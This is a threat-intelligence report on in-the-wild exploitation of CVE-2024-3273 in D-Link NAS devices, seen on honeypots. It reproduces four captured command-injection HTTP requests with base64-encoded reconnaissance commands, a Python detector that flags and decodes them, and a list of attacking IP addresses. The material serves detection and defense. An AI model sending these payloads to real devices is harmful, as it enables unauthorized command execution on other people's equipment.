CVE-2024-3273 (CVSSv3: N/A) was disclosed on the 3rd of April. It refers to a command injection vulnerability in legacy D-Link routers.
The first exploit attempt of this vulnerability against one of our honeypots occurred on the 10th of April, but we recorded a spike in the number of attempts on the 16th of April. Of note, the vulnerability was added to CISA’s Known Exploited Vulnerabilities catalog on the 11th of April.
This illustrates how quickly threat actors add very recently disclosed vulnerabilities to their cyber weapon arsenals. 130 unique IP addresses have attempted this exploit against our worldwide honeypot network, specifically targeting the honeypots hosted in Europe, equally on port TCP/80.
Our honeypots captured the following HTTP requests:
GET /cgi-bin/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1 Host: x.x.x.x:80
GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1 Host: x.x.x.x:80
GET /.most/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=cHMJfAlncmVwCW15ZGxpbms= HTTP/1.1 Host: x.x.x.x:80
GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=cHMJfAlncmVwCW15ZGxpbms= HTTP/1.1 Host: x.x.x.x:80
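The `system` parameter in these requests is base64-encoded. The following added example (not TEHTRIS code) flags request lines matching the captured pattern and decodes the parameter for triage; the signature (same `user`, empty `passwd`, `cmd=15`, any path) is an assumption derived only from the four requests above, and `BENIGN` is a constructed line.

```python
import base64
import binascii
from typing import NamedTuple, Optional
from urllib.parse import parse_qs, urlsplit

class Hit(NamedTuple):
    path: str
    command: Optional[str]  # None when the system value is not valid base64

# Request lines copied from the honeypot capture above.
CAPTURED = [
    "GET /cgi-bin/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1",
    "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1",
    "GET /.most/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=cHMJfAlncmVwCW15ZGxpbms= HTTP/1.1",
    "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=cHMJfAlncmVwCW15ZGxpbms= HTTP/1.1",
]
# Constructed line: ordinary traffic that must not match.
BENIGN = "GET /cgi-bin/status.cgi?user=admin&passwd=x HTTP/1.1"

def analyze(request_line: str) -> Optional[Hit]:
    """Return a Hit if the request line matches the captured probe pattern."""
    parts = request_line.split()
    if len(parts) < 2:
        return None
    url = urlsplit(parts[1])
    params = parse_qs(url.query, keep_blank_values=True)
    # Signature taken from the four captures: the path varies, the parameters do not.
    if params.get("user") != ["messagebus"] or params.get("passwd") != [""]:
        return None
    if params.get("cmd") != ["15"] or "system" not in params:
        return None
    # parse_qs turns '+' into a space; restore it before base64-decoding.
    encoded = params["system"][0].replace(" ", "+")
    try:
        command = base64.b64decode(encoded, validate=True).decode("utf-8", "replace")
    except binascii.Error:
        command = None
    return Hit(url.path, command)

if __name__ == "__main__":
    for line in CAPTURED + [BENIGN]:
        hit = analyze(line)
        # repr() makes the tab separators in the decoded command visible.
        print(hit.path, repr(hit.command)) if hit else print("no match:", line)
```

The two payloads decode to `uname -m` and `ps | grep mydlink`, with tab characters in place of spaces.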
Top 10 most active IP addresses – all identified as malicious by public databases
- 103.245.236.120 – VN 🇻🇳 – AS 150867 (LP TECHNOLOGY ELECTRONIC COMMERCE COMPANY LIMITED)
- 80.94.92.60 – RO 🇷🇴 – AS 47890 (Unmanaged Ltd)
- 45.128.232.107 – NL 🇳🇱 – AS 51396 (Pfcloud UG)
- 91.215.85.61 – RU 🇷🇺 – AS 200593 (Prospero Ooo)
- 103.67.196.77 – VN 🇻🇳 – AS 135918 (VIET DIGITAL TECHNOLOGY LIABILITY COMPANY)
- 14.225.53.162 – VN 🇻🇳 – AS 135905 (VIETNAM POSTS AND TELECOMMUNICATIONS GROUP)
- 183.81.169.139 – NL 🇳🇱 – AS 206264 (Amarutu Technology Ltd)
- 93.123.85.66 – BG 🇧🇬 – AS 216240 (MortalSoft Ltd.)
- 39.97.209.211 – CN 🇨🇳 – AS 37963 (Hangzhou Alibaba Advertising Co.,Ltd.)
- 116.198.40.76 – CN 🇨🇳 – AS 4808 (China Unicom Beijing Province Network)